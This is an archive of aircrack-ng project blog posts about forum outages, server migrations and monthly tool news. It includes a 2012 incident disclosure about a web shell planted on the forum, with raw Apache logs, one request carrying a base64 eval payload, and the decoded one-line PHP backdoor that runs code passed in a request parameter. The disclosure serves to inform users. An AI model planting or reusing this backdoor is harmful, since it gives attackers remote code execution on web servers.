Showing posts with label forum. Show all posts
Showing posts with label forum. Show all posts

Friday, July 6, 2012

Forum and trac/svn up

Hi,

June has been a very busy month for me, I didn't really have time to work on the forum and I apologize for that.
I've been working for the past week on bringing back up all those services. Trac and svn were safe to use and brought back up a few days ago and I spent a few more days to clean up the forum and migrate it to a new server. Nothing was lost and your login/passwords are still the same.

Since it is on a new machine, on its own, it should be faster than before and I can tell you that it is also better protected (I listened to your advices) :)
In this case, it also means a new IP and thus it might in some cases take a day or two for DNS to spread. How do you know you reached the new one?
Two ways:
  • Open it in a browser, the old forum will return a 403 Forbidden, so if you don't have that, you're good.
  • Do a nslookup forum.aircrack-ng.org. It should return 178.32.208.188.

Please send me feedback about the forum in the comments, especially if you have issues with it (I'll try to address them).

Enjoy

Tuesday, May 29, 2012

Forum virus details

Hi,

as you know, I shut down the server a few days ago because I was told there was a virus. Here is what I know about it so far. This post will be updated as I know more. There is a summary at the end of this post which will be useful for your IT department.

The virus is also known by Sophos as Mal/Iframe-W and it was uploaded in the forum in a separate directory inside the forum, 'data'. It's a piece of PHP called rbvzv.php (1418 bytes) that has a payload encoded in base64. Then it is passed to the JavaScript function eval() which is going to execute it.
If any of you guys is interested in the piece of code, you can download it here (the password is rbvzv.php) and please don't use it for malicious purposes; I'd love to know what it does but unfortunately I don't have the knowledge yet to decode it. I can read Javascript but the problem is that it's not plain Base64.

I checked the whole server and the attacker got in through the web server, no login and apache didn't have any privileges (user without bash, etc).

For those who are interested, here is the raw apache log from the attack:
91.224.160.132 - - [23/May/2012:01:12:04 +0200] "POST /data/rbvzv.php HTTP/1.1" 200 15 "http://forum.aircrack-ng.org/phpmyadmin/index.php" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; Media Center PC 6.0; InfoPath.2; MS-RTC LM 8)"
190.102.136.196 - - [23/May/2012:20:22:43 +0200] "POST /data/rbvzv.php HTTP/1.0" 200 727 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MAAR; .NET4.0C; .NET4.0E; AskTbPTV2/5.9.1.14019)"
81.30.222.42 - - [23/May/2012:20:23:26 +0200] "POST /data/rbvzv.php HTTP/1.1" 200 1212 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MAAR; .NET4.0C; .NET4.0E; AskTbPTV2/5.9.1.14019)"
116.55.19.96 - - [23/May/2012:20:24:50 +0200] "POST /data/rbvzv.php HTTP/1.1" 200 1212 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MAAR; .NET4.0C; .NET4.0E; AskTbPTV2/5.9.1.14019)"
61.50.171.2 - - [23/May/2012:20:28:15 +0200] "POST /data/rbvzv.php HTTP/1.1" 200 1270 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MAAR; .NET4.0C; .NET4.0E; AskTbPTV2/5.9.1.14019)"
178.218.224.2 - - [23/May/2012:20:27:01 +0200] "POST /data/rbvzv.php HTTP/1.1" 200 1270 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; MAAR; .NET4.0C; .NET4.0E; AskTbPTV2/5.9.1.14019)"
200.222.109.146 - - [24/May/2012:07:48:55 +0200] "POST /data/rbvzv.php HTTP/1.1" 200 19 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:5.0) Gecko/20110619 Firefox/5.0"
200.223.136.254 - - [24/May/2012:11:50:31 +0200] "POST /data/rbvzv.php HTTP/1.1" 200 19 "-" "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SLCC1; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.1.4322)"
210.101.131.232 - - [24/May/2012:15:49:50 +0200] "POST /data/rbvzv.php??asc=eval(base64_decode(%27ZXJyb3JfcmVwb3J0aW5nKC0xKTtzZXRfdGltZV9saW1pdCgxODAwKTtpZ25vcmVfdXNlcl9hYm9ydCgxKTsNCiRwYXRocyA9ICcvdm HTTP/1.1" 200 19 "-" "Chrome/15.0.860.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/15.0.860.0"


As you can see, the file was created by that first guy, 91.224.160.132 and the timestamp (creation and last modification) of the file confirms it:
-rw-r--r-- 1 USER GROUP 1418 2012-05-23 01:12 rbvzv.php

I have to thank @SwissHttp on twitter for decoding it and here is the result (PHP):
if(isset($_REQUEST['a'.'s'.'c']))eval(stripslashes($_REQUEST['a'.'s'.'c']));


Basically, it executes what is passed in the parameter 'asc' (and strips slashes) and you can see an example use on the last line of the Apache log posted above. I'll see if I can get my hands on the complete request and not just part of it.

Unfortunately, I don't think I can do anything against those guys (besides talking about it), a whois on that IP address looks like it's a shady business (Bergdorf Group Ltd): IP in the Netherlands but the person to contact lives in the Virgin Islands. Anyway, I sent them an email. I got an answer this morning (May 30) asking for some more information that I just provided. We'll see how it goes.

As far as I know, it is limited to the forum and nothing else. The attacker didn't get on the server or installed any backdoor.

So here is what I'm gonna do next: I'll check the forum database to see if they tried anything else against the forum (and check the apache logs to see if there is any other mention of those IP addresses). I want to know how it happened exactly and when.
The forum is probably going to stay down for another week, I want to migrate it to another server and I need to make sure everything works properly and the new DNS are propagated.


So, to summarize: it happened a day before I got the email letting me know there is a virus. It happened May 22 at 23h12 (11.12pm) GMT/UTC and I stopped it on May 24, around 14h00 (2pm) GMT/UTC.
I don't remember noticing anything special when browsing the forum between those dates (I'm not sure if I browsed it on those dates). In case you experienced anything, let me know. I'm really sorry about it.

Monday, June 7, 2010

Monthly news (June 2010)

Here is the 5th edition of our monthly news.

Project:
  • We had some downtime on the server hosting trac and forum between the 16th and the 20th (hardware issues) and fortunatly nothing was lost. You can read more in these 2 posts: Trac and forum down and Trac and forum up again.
  • The forum will be moved to the new server in a bit more than 2 weeks. The change will be transparent for you. And that means only trac and buildbot are left on the old server. They should be done before Defcon.


Forum:
  • Airoscript not dead. It got some updates and is now renamed to Airoscript-ng. To get it, type svn co http://trac.aircrack-ng.org/svn/branch/airoscript-ng in a console.
  • Beini 1.2.1 was released a few days ago. It can be downloaded it from its website.
  • minidwep-gtk, a GUI of aircrack-ng in shell script, has been updated to work with Aircrack-ng 1.1.
  • criser, the author of WepCrackGui, is developping a QT frontend for WepCrackGUI that should be included in the next release, v0.9. You can find instructions to get the sources and test it in this post. He also posted some screenshots. You can follow him on twitter: @wepcrackgui.

Other:
  • I'll give a talk at Sharkfest about wireless security next week.
  • digininja released a Karma patch for hostapd. It now works with ath5k and ath9k. It should work with prism54 and various other cards but that's untested.
  • Backtrack 4 r1 was released. Changes: new kernel (2.6.34-rc6), packages updates, and new drivers. Note that it is an unofficial build meant for assesing hardware incompatibilities with the new kernel.
  • The WiFi Alliances and WiGig announced alliance on multi-Gigabit wireless networks in the 60Ghz band. It will allow up to 7 Gigabit/s. You can read more here. The official press release can be found on WiGig website.
  • Here is another GUI in Java for Aircrack-ng: GRIM WEPA.

Thursday, May 20, 2010

Trac and forum up again

You probably noticed earlier today that the trac and forum were working again. They finally fixed the issue (which was according to them probably a bad RAM module or the CPU fan) by replacing completely the server (but keeping the hard drive).

I think that it's the CPU fan that failed, not the RAM module. But whatever, it works again and that was what we all wanted.

Wednesday, May 19, 2010

Trac and forum down

All started Sunday, around 6AM GMT, our 4-year old dedicated server wasn't responding anymore and even a hardware reboot didn't bring it up. So, I opened a ticket and the technicians noticed the power supply died and quickly replaced it.

Everything worked fine until Monday morning, 9AM GMT, the server started to be unstable. I first thought it was Apache because during my tests, the process used several times 100% CPU when it crashed.
Then I tried stopping Apache and MySQL, the 2 most consuming processes (the CPU usage was on average at 6% without these 2 processes) and even with that, it was crashing after 15 minutes.

I thought that our kernel might be corrupted due to the crash of the server, so I tried using one of their netboot kernel (as well as the hardware testing mode) and it kept crashing.

So, I just opened another ticket for this issue. I really wonder what's going on.

Also, the migration of the forum and trac to the new server was planned at the end of this month but it might happen sooner than expected (I'll try to do it this week-end).

I'll keep you updated.

Wednesday, February 3, 2010

Monthly news

A few things happened last month:
- The google phone, Nexus One was rooted and it has a bcm4329 chipset and it looks promising.
- Airodump-ng (in svn trunk) now has interactive mode: you can control it with keys. You can find the documentation in the wiki.
- A really small (only 10MB) distribution based on MicroCore Linux, console only.
- I'm sure you saw it, Backtrack 4 was released a few weeks ago.
- OSX Compiling (Ticket 687) should be fixed now (svn trunk revision 1657).
- New version of Beini: 1.0 RC5.2
- The developement of the GUI in C# (Mono) is quite active.

Last but not least, aircrack-ng will be 4 years old by the end of february :)

Saturday, January 9, 2010

Trac, bugs, forum and t-shirts

Actually, trac is not completely working. It's better than before, we can commit but now we can't see them in the timeline and also the source browser is not working anymore.
I tried to debug a few days ago but I haven't found why it doesn't work. The path to the svn repository is correct, permissions of trac and on the filesystem are correct so I'm a bit out of ideas.

About the commits, I updated to 1.0 and tagged it and also committed a few patches to fix bugs:
- Client first seen and last seen in kismet netxml file
- Compilation on cygwin 1.7
- OSX patch: Ticket 653: Tap support for Darwin/OS X
- Other small things

The next bugs I'll take care of are:
- Ticket 704: Fix broadcast and multicast detection in aircrack-ng: it still require some work.
- Ticket 498: Aircrack-ng does not support dictionaries over 2Gb
- I'd like to fix another compilation bug on OSX (Ticket 687) but I don't have access to any Mac so if anyone could give me an access to a mac with Darwin and another with Leopard, that's great :). If anybody is getting rid of a Mac with darwin/leopard, we are really interested.
- Ticket 713: Invalid channel parsed from packets with mac80211 drivers

I haven't chosen the other bugs yet, but I still have in mind that WPA handshake detection has to be fixed/enhanced and I remember a bug with airbase-ng not giving the Information Elements in the right order.


There are a few interesting programs and scripts in the forum, and I'd like to give them more visibility (and even small scripts). What are your ideas/opinion about it?


I haven't forgotten the t-shirts. They will be there soon. I might do a few with the new logo for Shmoocon.



Edit (16 Jan 2010): Added one more bug to the list

Wednesday, March 25, 2009

Forum up

The forum is finally up and everything is working fine:
  • DNS updated
  • Redirection works fine: all your bookmarks (and links in the forum) with the old address should redirect to the new one automatically (I was surprised to see new posts announced on IRC that still has the old RSS feed address). Technically, the old URL rewrite the URL to point to the new location with the parameters and uses a 301 to do that.
  • Links (URLs, RSS) are updated on the wiki.
  • No more glitches on the server. However if it happens, don't hesitate to send a mail to tdotreppe@aircrack-ng.org to tell me (with details).

Last but not least, the 1.0rc3 release should be done tomorrow if everything goes well (I told Murphy to leave me alone at least for a few days) :)

Monday, March 23, 2009

Forum down

As you saw, the forum has been down since a few hours, around 6pm GMT+1.

The reason is that the database size is really close to the allowed disk space and the hoster stopped it automatically. I moved it to another place (where we have much more space) and there are just a few things to do before it's back up:
- DNS needs to be updated
- a few glitches on the server have to be fixed
- A script has to be written to redirect all requests from forum.tinyshell.be to the new URL (so that any link to it will still work).

The good news is that nothing was lost and it should be faster than before.

Ah yeah, ... It should be back up tomorrow evening and the release of 1.0rc3 will be done the next day :).